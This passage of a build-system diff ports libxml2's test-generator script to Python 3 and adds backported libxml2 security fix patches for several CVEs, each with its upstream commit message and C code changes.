+ return('eaten_name')
+ if res == 'void_ptr*':
+ res = 'void_ptr_ptr'
+@@ -393,7 +393,7 @@ def type_convert(str, name, info, module, function, pos):
+ res = 'debug_FILE_ptr';
+ if res == 'int' and name == 'options':
+ if module == 'parser' or module == 'xmlreader':
+- res = 'parseroptions'
++ res = 'parseroptions'
+
+ return res
+
+@@ -402,28 +402,28 @@ known_param_types = []
+ def is_known_param_type(name):
+ for type in known_param_types:
+ if type == name:
+- return 1
++ return 1
+ return name[-3:] == 'Ptr' or name[-4:] == '_ptr'
+
+ def generate_param_type(name, rtype):
+ global test
+ for type in known_param_types:
+ if type == name:
+- return
++ return
+ for type in generated_param_types:
+ if type == name:
+- return
++ return
+
+ if name[-3:] == 'Ptr' or name[-4:] == '_ptr':
+ if rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
+
+ define = 0
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""
+ #define gen_nb_%s 1
+ static %s gen_%s(int no ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+@@ -433,7 +433,7 @@ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTR
+ }
+ """ % (name, crtype, name, name, rtype))
+ if define == 1:
+- test.write("#endif\n\n")
++ test.write("#endif\n\n")
+ add_generated_param_type(name)
+
+ #
+@@ -445,7 +445,7 @@ known_return_types = []
+ def is_known_return_type(name):
+ for type in known_return_types:
+ if type == name:
+- return 1
++ return 1
+ return 0
+
+ #
+@@ -471,7 +471,7 @@ def compare_and_save():
+ try:
+ os.system("rm testapi.c; mv testapi.c.new testapi.c")
+ except:
+- os.system("mv testapi.c.new testapi.c")
++ os.system("mv testapi.c.new testapi.c")
+ print("Updated testapi.c")
+ else:
+ print("Generated testapi.c is identical")
+@@ -481,17 +481,17 @@ while line != "":
+ if line == "/* CUT HERE: everything below that line is generated */\n":
+ break;
+ if line[0:15] == "#define gen_nb_":
+- type = string.split(line[15:])[0]
+- known_param_types.append(type)
++ type = line[15:].split()[0]
++ known_param_types.append(type)
+ if line[0:19] == "static void desret_":
+- type = string.split(line[19:], '(')[0]
+- known_return_types.append(type)
++ type = line[19:].split('(')[0]
++ known_return_types.append(type)
+ test.write(line)
+ line = input.readline()
+ input.close()
+
+ if line == "":
+- print "Could not find the CUT marker in testapi.c skipping generation"
++ print("Could not find the CUT marker in testapi.c skipping generation")
+ test.close()
+ sys.exit(0)
+
+@@ -505,7 +505,7 @@ test.write("/* CUT HERE: everything below that line is generated */\n")
+ #
+ doc = libxml2.readFile(srcPref + 'doc/libxml2-api.xml', None, 0)
+ if doc == None:
+- print "Failed to load doc/libxml2-api.xml"
++ print("Failed to load doc/libxml2-api.xml")
+ sys.exit(1)
+ ctxt = doc.xpathNewContext()
+
+@@ -519,9 +519,9 @@ for arg in args:
+ mod = arg.xpathEval('string(../@file)')
+ func = arg.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+- type = arg.xpathEval('string(@type)')
+- if not argtypes.has_key(type):
+- argtypes[type] = func
++ type = arg.xpathEval('string(@type)')
++ if type not in argtypes:
++ argtypes[type] = func
+
+ # similarly for return types
+ rettypes = {}
+@@ -531,8 +531,8 @@ for ret in rets:
+ func = ret.xpathEval('string(../@name)')
+ if (mod not in skipped_modules) and (func not in skipped_functions):
+ type = ret.xpathEval('string(@type)')
+- if not rettypes.has_key(type):
+- rettypes[type] = func
++ if type not in rettypes:
++ rettypes[type] = func
+
+ #
+ # Generate constructors and return type handling for all enums
+@@ -549,49 +549,49 @@ for enum in enums:
+ continue;
+ define = 0
+
+- if argtypes.has_key(name) and is_known_param_type(name) == 0:
+- values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
+- i = 0
+- vals = []
+- for value in values:
+- vname = value.xpathEval('string(@name)')
+- if vname == None:
+- continue;
+- i = i + 1
+- if i >= 5:
+- break;
+- vals.append(vname)
+- if vals == []:
+- print "Didn't find any value for enum %s" % (name)
+- continue
+- if modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
+- test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
+- test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
+- (name, name))
+- i = 1
+- for value in vals:
+- test.write(" if (no == %d) return(%s);\n" % (i, value))
+- i = i + 1
+- test.write(""" return(0);
++ if (name in argtypes) and is_known_param_type(name) == 0:
++ values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
++ i = 0
++ vals = []
++ for value in values:
++ vname = value.xpathEval('string(@name)')
++ if vname == None:
++ continue;
++ i = i + 1
++ if i >= 5:
++ break;
++ vals.append(vname)
++ if vals == []:
++ print("Didn't find any value for enum %s" % (name))
++ continue
++ if module in modules_defines:
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
++ test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
++ test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
++ (name, name))
++ i = 1
++ for value in vals:
++ test.write(" if (no == %d) return(%s);\n" % (i, value))
++ i = i + 1
++ test.write(""" return(0);
+ }
+
+ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name));
+- known_param_types.append(name)
++ known_param_types.append(name)
+
+ if (is_known_return_type(name) == 0) and (name in rettypes):
+- if define == 0 and modules_defines.has_key(module):
+- test.write("#ifdef %s\n" % (modules_defines[module]))
+- define = 1
++ if define == 0 and (module in modules_defines):
++ test.write("#ifdef %s\n" % (modules_defines[module]))
++ define = 1
+ test.write("""static void desret_%s(%s val ATTRIBUTE_UNUSED) {
+ }
+
+ """ % (name, name))
+- known_return_types.append(name)
++ known_return_types.append(name)
+ if define == 1:
+ test.write("#endif\n\n")
+
+@@ -615,9 +615,9 @@ for file in headers:
+ # do not test deprecated APIs
+ #
+ desc = file.xpathEval('string(description)')
+- if string.find(desc, 'DEPRECATED') != -1:
+- print "Skipping deprecated interface %s" % name
+- continue;
++ if desc.find('DEPRECATED') != -1:
++ print("Skipping deprecated interface %s" % name)
++ continue;
+
+ test.write("#include <libxml/%s.h>\n" % name)
+ modules.append(name)
+@@ -679,7 +679,7 @@ def generate_test(module, node):
+ # and store the informations for the generation
+ #
+ try:
+- args = node.xpathEval("arg")
++ args = node.xpathEval("arg")
+ except:
+ args = []
+ t_args = []
+@@ -687,37 +687,37 @@ def generate_test(module, node):
+ for arg in args:
+ n = n + 1
+ rtype = arg.xpathEval("string(@type)")
+- if rtype == 'void':
+- break;
+- info = arg.xpathEval("string(@info)")
+- nam = arg.xpathEval("string(@name)")
++ if rtype == 'void':
++ break;
++ info = arg.xpathEval("string(@info)")
++ nam = arg.xpathEval("string(@name)")
+ type = type_convert(rtype, nam, info, module, name, n)
+- if is_known_param_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
++ if is_known_param_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
+ if (type[-3:] == 'Ptr' or type[-4:] == '_ptr') and \
+- rtype[0:6] == 'const ':
+- crtype = rtype[6:]
+- else:
+- crtype = rtype
+- t_args.append((nam, type, rtype, crtype, info))
++ rtype[0:6] == 'const ':
++ crtype = rtype[6:]
++ else:
++ crtype = rtype
++ t_args.append((nam, type, rtype, crtype, info))
+
+ try:
+- rets = node.xpathEval("return")
++ rets = node.xpathEval("return")
+ except:
+ rets = []
+ t_ret = None
+ for ret in rets:
+ rtype = ret.xpathEval("string(@type)")
+- info = ret.xpathEval("string(@info)")
++ info = ret.xpathEval("string(@info)")
+ type = type_convert(rtype, 'return', info, module, name, 0)
+- if rtype == 'void':
+- break
+- if is_known_return_type(type) == 0:
+- add_missing_type(type, name);
+- no_gen = 1
+- t_ret = (type, rtype, info)
+- break
++ if rtype == 'void':
++ break
++ if is_known_return_type(type) == 0:
++ add_missing_type(type, name);
++ no_gen = 1
++ t_ret = (type, rtype, info)
++ break
+
+ if no_gen == 0:
+ for t_arg in t_args:
+@@ -733,7 +733,7 @@ test_%s(void) {
+
+ if no_gen == 1:
+ add_missing_functions(name, module)
+- test.write("""
++ test.write("""
+ /* missing type support */
+ return(test_ret);
+ }
+@@ -742,22 +742,22 @@ test_%s(void) {
+ return
+
+ try:
+- conds = node.xpathEval("cond")
+- for cond in conds:
+- test.write("#if %s\n" % (cond.get_content()))
+- nb_cond = nb_cond + 1
++ conds = node.xpathEval("cond")
++ for cond in conds:
++ test.write("#if %s\n" % (cond.get_content()))
++ nb_cond = nb_cond + 1
+ except:
+ pass
+
+ define = 0
+- if function_defines.has_key(name):
++ if name in function_defines:
+ test.write("#ifdef %s\n" % (function_defines[name]))
+- define = 1
++ define = 1
+
+ # Declare the memory usage counter
+ no_mem = is_skipped_memcheck(name)
+ if no_mem == 0:
+- test.write(" int mem_base;\n");
++ test.write(" int mem_base;\n");
+
+ # Declare the return value
+ if t_ret != None:
+@@ -766,29 +766,29 @@ test_%s(void) {
+ # Declare the arguments
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # add declaration
+- test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
+- test.write(" int n_%s;\n" % (nam))
++ # add declaration
++ test.write(" %s %s; /* %s */\n" % (crtype, nam, info))
++ test.write(" int n_%s;\n" % (nam))
+ test.write("\n")
+
+ # Cascade loop on of each argument list of values
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
+- nam, nam, type, nam))
++ #
++ test.write(" for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
++ nam, nam, type, nam))
+
+ # log the memory usage
+ if no_mem == 0:
+- test.write(" mem_base = xmlMemBlocks();\n");
++ test.write(" mem_base = xmlMemBlocks();\n");
+
+ # prepare the call
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- #
+- test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
+- i = i + 1;
++ #
++ test.write(" %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
++ i = i + 1;
+
+ # add checks to avoid out-of-bounds array access
+ i = 0;
+@@ -797,7 +797,7 @@ test_%s(void) {
+ # assume that "size", "len", and "start" parameters apply to either
+ # the nearest preceding or following char pointer
+ if type == "int" and (nam == "size" or nam == "len" or nam == "start"):
+- for j in range(i - 1, -1, -1) + range(i + 1, len(t_args)):
++ for j in (*range(i - 1, -1, -1), *range(i + 1, len(t_args))):
+ (bnam, btype) = t_args[j][:2]
+ if btype == "const_char_ptr" or btype == "const_xmlChar_ptr":
+ test.write(
+@@ -806,42 +806,42 @@ test_%s(void) {
+ " continue;\n"
+ % (bnam, nam, bnam))
+ break
+- i = i + 1;
++ i = i + 1;
+
+ # do the call, and clanup the result
+- if extra_pre_call.has_key(name):
+- test.write(" %s\n"% (extra_pre_call[name]))
++ if name in extra_pre_call:
++ test.write(" %s\n"% (extra_pre_call[name]))
+ if t_ret != None:
+- test.write("\n ret_val = %s(" % (name))
+- need = 0
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam);
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
+- test.write(" desret_%s(ret_val);\n" % t_ret[0])
++ test.write("\n ret_val = %s(" % (name))
++ need = 0
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam);
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
++ test.write(" desret_%s(ret_val);\n" % t_ret[0])
+ else:
+- test.write("\n %s(" % (name));
+- need = 0;
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- if need:
+- test.write(", ")
+- else:
+- need = 1
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s" % nam)
+- test.write(");\n")
+- if extra_post_call.has_key(name):
+- test.write(" %s\n"% (extra_post_call[name]))
++ test.write("\n %s(" % (name));
++ need = 0;
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ if need:
++ test.write(", ")
++ else:
++ need = 1
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s" % nam)
++ test.write(");\n")
++ if name in extra_post_call:
++ test.write(" %s\n"% (extra_post_call[name]))
+
+ test.write(" call_tests++;\n");
+
+@@ -849,32 +849,32 @@ test_%s(void) {
+ i = 0;
+ for arg in t_args:
+ (nam, type, rtype, crtype, info) = arg;
+- # This is a hack to prevent generating a destructor for the
+- # 'input' argument in xmlTextReaderSetup. There should be
+- # a better, more generic way to do this!
+- if string.find(info, 'destroy') == -1:
+- test.write(" des_%s(n_%s, " % (type, nam))
+- if rtype != crtype:
+- test.write("(%s)" % rtype)
+- test.write("%s, %d);\n" % (nam, i))
+- i = i + 1;
++ # This is a hack to prevent generating a destructor for the
++ # 'input' argument in xmlTextReaderSetup. There should be
++ # a better, more generic way to do this!
++ if info.find('destroy') == -1:
++ test.write(" des_%s(n_%s, " % (type, nam))
++ if rtype != crtype:
++ test.write("(%s)" % rtype)
++ test.write("%s, %d);\n" % (nam, i))
++ i = i + 1;
+
+ test.write(" xmlResetLastError();\n");
+ # Check the memory usage
+ if no_mem == 0:
+- test.write(""" if (mem_base != xmlMemBlocks()) {
++ test.write(""" if (mem_base != xmlMemBlocks()) {
+ printf("Leak of %%d blocks found in %s",
+- xmlMemBlocks() - mem_base);
+- test_ret++;
++\t xmlMemBlocks() - mem_base);
++\t test_ret++;
+ """ % (name));
+- for arg in t_args:
+- (nam, type, rtype, crtype, info) = arg;
+- test.write(""" printf(" %%d", n_%s);\n""" % (nam))
+- test.write(""" printf("\\n");\n""")
+- test.write(" }\n")
++ for arg in t_args:
++ (nam, type, rtype, crtype, info) = arg;
++ test.write(""" printf(" %%d", n_%s);\n""" % (nam))
++ test.write(""" printf("\\n");\n""")
++ test.write(" }\n")
+
+ for arg in t_args:
+- test.write(" }\n")
++ test.write(" }\n")
+
+ test.write(" function_tests++;\n")
+ #
+@@ -882,7 +882,7 @@ test_%s(void) {
+ #
+ while nb_cond > 0:
+ test.write("#endif\n")
+- nb_cond = nb_cond -1
++ nb_cond = nb_cond -1
+ if define == 1:
+ test.write("#endif\n")
+
+@@ -900,10 +900,10 @@ test_%s(void) {
+ for module in modules:
+ # gather all the functions exported by that module
+ try:
+- functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
++ functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
+ except:
+- print "Failed to gather functions from module %s" % (module)
+- continue;
++ print("Failed to gather functions from module %s" % (module))
++ continue;
+
+ # iterate over all functions in the module generating the test
+ i = 0
+@@ -923,14 +923,14 @@ test_%s(void) {
+ # iterate over all functions in the module generating the call
+ for function in functions:
+ name = function.xpathEval('string(@name)')
+- if is_skipped_function(name):
+- continue
+- test.write(" test_ret += test_%s();\n" % (name))
++ if is_skipped_function(name):
++ continue
++ test.write(" test_ret += test_%s();\n" % (name))
+
+ # footer
+ test.write("""
+ if (test_ret != 0)
+- printf("Module %s: %%d errors\\n", test_ret);
++\tprintf("Module %s: %%d errors\\n", test_ret);
+ return(test_ret);
+ }
+ """ % (module))
+@@ -948,7 +948,7 @@ test.write(""" return(0);
+ }
+ """);
+
+-print "Generated test for %d modules and %d functions" %(len(modules), nb_tests)
++print("Generated test for %d modules and %d functions" %(len(modules), nb_tests))
+
+ compare_and_save()
+
+@@ -960,11 +960,8 @@ for missing in missing_types.keys():
+ n = len(missing_types[missing])
+ missing_list.append((n, missing))
+
+-def compare_missing(a, b):
+- return b[0] - a[0]
+-
+-missing_list.sort(compare_missing)
+-print "Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list))
++missing_list.sort(key=lambda a: a[0])
++print("Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list)))
+ lst = open("missing.lst", "w")
+ lst.write("Missing support for %d types" % (len(missing_list)))
+ lst.write("\n")
+@@ -974,9 +971,9 @@ for miss in missing_list:
+ for n in missing_types[miss[1]]:
+ i = i + 1
+ if i > 5:
+- lst.write(" ...")
+- break
+- lst.write(" %s" % (n))
++ lst.write(" ...")
++ break
++ lst.write(" %s" % (n))
+ lst.write("\n")
+ lst.write("\n")
+ lst.write("\n")
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
new file mode 100644
index 0000000000..5301d05323
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
@@ -0,0 +1,89 @@
+From c1ba6f54d32b707ca6d91cb3257ce9de82876b6f Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 15 Aug 2020 18:32:29 +0200
+Subject: [PATCH] Revert "Do not URI escape in server side includes"
+
+This reverts commit 960f0e275616cadc29671a218d7fb9b69eb35588.
+
+This commit introduced
+
+- an infinite loop, found by OSS-Fuzz, which could be easily fixed.
+- an algorithm with quadratic runtime
+- a security issue, see
+ https://bugzilla.gnome.org/show_bug.cgi?id=769760
+
+A better approach is to add an option not to escape URLs at all
+which libxml2 should have possibly done in the first place.
+
+CVE: CVE-2016-3709
+Upstream-Status: Backport [https://github.com/GNOME/libxml2/commit/c1ba6f54d32b707ca6d91cb3257ce9de82876b6f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+---
+ HTMLtree.c | 49 +++++++++++--------------------------------------
+ 1 file changed, 11 insertions(+), 38 deletions(-)
+
+diff --git a/HTMLtree.c b/HTMLtree.c
+index 8d236bb35..cdb7f86a6 100644
+--- a/HTMLtree.c
++++ b/HTMLtree.c
+@@ -706,49 +706,22 @@ htmlAttrDumpOutput(xmlOutputBufferPtr buf, xmlDocPtr doc, xmlAttrPtr cur,
+ (!xmlStrcasecmp(cur->name, BAD_CAST "src")) ||
+ ((!xmlStrcasecmp(cur->name, BAD_CAST "name")) &&
+ (!xmlStrcasecmp(cur->parent->name, BAD_CAST "a"))))) {
++ xmlChar *escaped;
+ xmlChar *tmp = value;
+- /* xmlURIEscapeStr() escapes '"' so it can be safely used. */
+- xmlBufCCat(buf->buffer, "\"");
+
+ while (IS_BLANK_CH(*tmp)) tmp++;
+
+- /* URI Escape everything, except server side includes. */
+- for ( ; ; ) {
+- xmlChar *escaped;
+- xmlChar endChar;
+- xmlChar *end = NULL;
+- xmlChar *start = (xmlChar *)xmlStrstr(tmp, BAD_CAST "<!--");
+- if (start != NULL) {
+- end = (xmlChar *)xmlStrstr(tmp, BAD_CAST "-->");
+- if (end != NULL) {
+- *start = '\0';
+- }
+- }
+-
+- /* Escape the whole string, or until start (set to '\0'). */
+- escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+");
+- if (escaped != NULL) {
+- xmlBufCat(buf->buffer, escaped);
+- xmlFree(escaped);
+- } else {
+- xmlBufCat(buf->buffer, tmp);
+- }
+-
+- if (end == NULL) { /* Everything has been written. */
+- break;
+- }
+-
+- /* Do not escape anything within server side includes. */
+- *start = '<'; /* Restore the first character of "<!--". */
+- end += 3; /* strlen("-->") */
+- endChar = *end;
+- *end = '\0';
+- xmlBufCat(buf->buffer, start);
+- *end = endChar;
+- tmp = end;
++ /*
++ * the < and > have already been escaped at the entity level
++ * And doing so here breaks server side includes
++ */
++ escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+<>");
++ if (escaped != NULL) {
++ xmlBufWriteQuotedString(buf->buffer, escaped);
++ xmlFree(escaped);
++ } else {
++ xmlBufWriteQuotedString(buf->buffer, value);
+ }
+-
+- xmlBufCCat(buf->buffer, "\"");
+ } else {
+ xmlBufWriteQuotedString(buf->buffer, value);
+ }
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
new file mode 100644
index 0000000000..200f42091e
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
@@ -0,0 +1,35 @@
+From 1358d157d0bd83be1dfe356a69213df9fac0b539 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 21 Apr 2021 13:23:27 +0200
+Subject: [PATCH] Fix use-after-free with `xmllint --html --push`
+
+Call htmlCtxtUseOptions to make sure that names aren't stored in
+dictionaries.
+
+Note that this issue only affects xmllint using the HTML push parser.
+
+Fixes #230.
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539]
+CVE: CVE-2021-3516
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ xmllint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/xmllint.c b/xmllint.c
+index 6ca1bf54d..dbef273a8 100644
+--- a/xmllint.c
++++ b/xmllint.c
+@@ -2213,7 +2213,7 @@ static void parseAndPrintFile(char *filename, xmlParserCtxtPtr rectxt) {
+ if (res > 0) {
+ ctxt = htmlCreatePushParserCtxt(NULL, NULL,
+ chars, res, filename, XML_CHAR_ENCODING_NONE);
+- xmlCtxtUseOptions(ctxt, options);
++ htmlCtxtUseOptions(ctxt, options);
+ while ((res = fread(chars, 1, pushsize, f)) > 0) {
+ htmlParseChunk(ctxt, chars, res, 0);
+ }
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
new file mode 100644
index 0000000000..e88a8ae7c6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
@@ -0,0 +1,53 @@
+From bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Mon Sep 17 00:00:00 2001
+From: Joel Hockey <joel.hockey@gmail.com>
+Date: Sun, 16 Aug 2020 17:19:35 -0700
+Subject: [PATCH] Validate UTF8 in xmlEncodeEntities
+
+Code is currently assuming UTF-8 without validating. Truncated UTF-8
+input can cause out-of-bounds array access.
+
+Adds further checks to partial fix in 50f06b3e.
+
+Fixes #178
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2]
+CVE: CVE-2021-3517
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ entities.c | 16 +++++++++++++++-
+ 1 file changed, 15 insertions(+), 1 deletion(-)
+
+diff --git a/entities.c b/entities.c
+index 37b99a56..1a8f86f0 100644
+--- a/entities.c
++++ b/entities.c
+@@ -704,11 +704,25 @@ xmlEncodeEntitiesInternal(xmlDocPtr doc, const xmlChar *input, int attr) {
+ } else {
+ /*
+ * We assume we have UTF-8 input.
++ * It must match either:
++ * 110xxxxx 10xxxxxx
++ * 1110xxxx 10xxxxxx 10xxxxxx
++ * 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
++ * That is:
++ * cur[0] is 11xxxxxx
++ * cur[1] is 10xxxxxx
++ * cur[2] is 10xxxxxx if cur[0] is 111xxxxx
++ * cur[3] is 10xxxxxx if cur[0] is 1111xxxx
++ * cur[0] is not 11111xxx
+ */
+ char buf[11], *ptr;
+ int val = 0, l = 1;
+
+- if (*cur < 0xC0) {
++ if (((cur[0] & 0xC0) != 0xC0) ||
++ ((cur[1] & 0xC0) != 0x80) ||
++ (((cur[0] & 0xE0) == 0xE0) && ((cur[2] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF0) == 0xF0) && ((cur[3] & 0xC0) != 0x80)) ||
++ (((cur[0] & 0xF8) == 0xF8))) {
+ xmlEntitiesErr(XML_CHECK_NOT_UTF8,
+ "xmlEncodeEntities: input not UTF-8");
+ if (doc != NULL)
+--
+GitLab
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
new file mode 100644
index 0000000000..40d3debea1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
@@ -0,0 +1,112 @@
+From ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 10 Jun 2020 16:34:52 +0200
+Subject: [PATCH 1/2] Don't recurse into xi:include children in
+ xmlXIncludeDoProcess
+
+Otherwise, nested xi:include nodes might result in a use-after-free
+if XML_PARSE_NOXINCNODE is specified.
+
+Found with libFuzzer and ASan.
+
+Upstream-Status: Backport [from fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1954243]
+
+The upstream patch 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4 has been modified,
+as to avoid unnecessary modifications to fallback files.
+
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 24 ++++++++++--------------
+ 1 file changed, 10 insertions(+), 14 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index ba850fa5..f260c1a7 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2392,21 +2392,19 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ * First phase: lookup the elements in the document
+ */
+ cur = tree;
+- if (xmlXIncludeTestNode(ctxt, cur) == 1)
+- xmlXIncludePreProcessNode(ctxt, cur);
+ while ((cur != NULL) && (cur != tree->parent)) {
+ /* TODO: need to work on entities -> stack */
+- if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
+- cur = cur->children;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+- } else if (cur->next != NULL) {
++ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
++ xmlXIncludePreProcessNode(ctxt, cur);
++ } else if ((cur->children != NULL) &&
++ (cur->children->type != XML_ENTITY_DECL) &&
++ (cur->children->type != XML_XINCLUDE_START) &&
++ (cur->children->type != XML_XINCLUDE_END)) {
++ cur = cur->children;
++ continue;
++ }
++ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ } else {
+ if (cur == tree)
+ break;
+@@ -2416,8 +2414,6 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ break; /* do */
+ if (cur->next != NULL) {
+ cur = cur->next;
+- if (xmlXIncludeTestNode(ctxt, cur))
+- xmlXIncludePreProcessNode(ctxt, cur);
+ break; /* do */
+ }
+ } while (cur != NULL);
+--
+2.32.0
+
+
+From 3ad5ac1e39e3cd42f838c1cd27ffd4e9b79e6121 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 22 Apr 2021 19:26:28 +0200
+Subject: [PATCH 2/2] Fix user-after-free with `xmllint --xinclude --dropdtd`
+
+The --dropdtd option can leave dangling pointers in entity reference
+nodes. Make sure to skip these nodes when processing XIncludes.
+
+This also avoids scanning entity declarations and even modifying
+them inadvertently during XInclude processing.
+
+Move from a block list to an allow list approach to avoid descending
+into other node types that can't contain elements.
+
+Fixes #237.
+Upstream-Status: Backport
+CVE: CVE-2021-3518
+Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
+---
+ xinclude.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/xinclude.c b/xinclude.c
+index f260c1a7..d7648529 100644
+--- a/xinclude.c
++++ b/xinclude.c
+@@ -2397,9 +2397,8 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
+ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
+ xmlXIncludePreProcessNode(ctxt, cur);
+ } else if ((cur->children != NULL) &&
+- (cur->children->type != XML_ENTITY_DECL) &&
+- (cur->children->type != XML_XINCLUDE_START) &&
+- (cur->children->type != XML_XINCLUDE_END)) {
++ ((cur->type == XML_DOCUMENT_NODE) ||
++ (cur->type == XML_ELEMENT_NODE))) {
+ cur = cur->children;
+ continue;
+ }
+--
+2.32.0
+
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
new file mode 100644
index 0000000000..9e64c2a36d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
@@ -0,0 +1,50 @@
+From babe75030c7f64a37826bb3342317134568bef61 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 1 May 2021 16:53:33 +0200
+Subject: [PATCH] Propagate error in xmlParseElementChildrenContentDeclPriv
+
+Check return value of recursive calls to
+xmlParseElementChildrenContentDeclPriv and return immediately in case
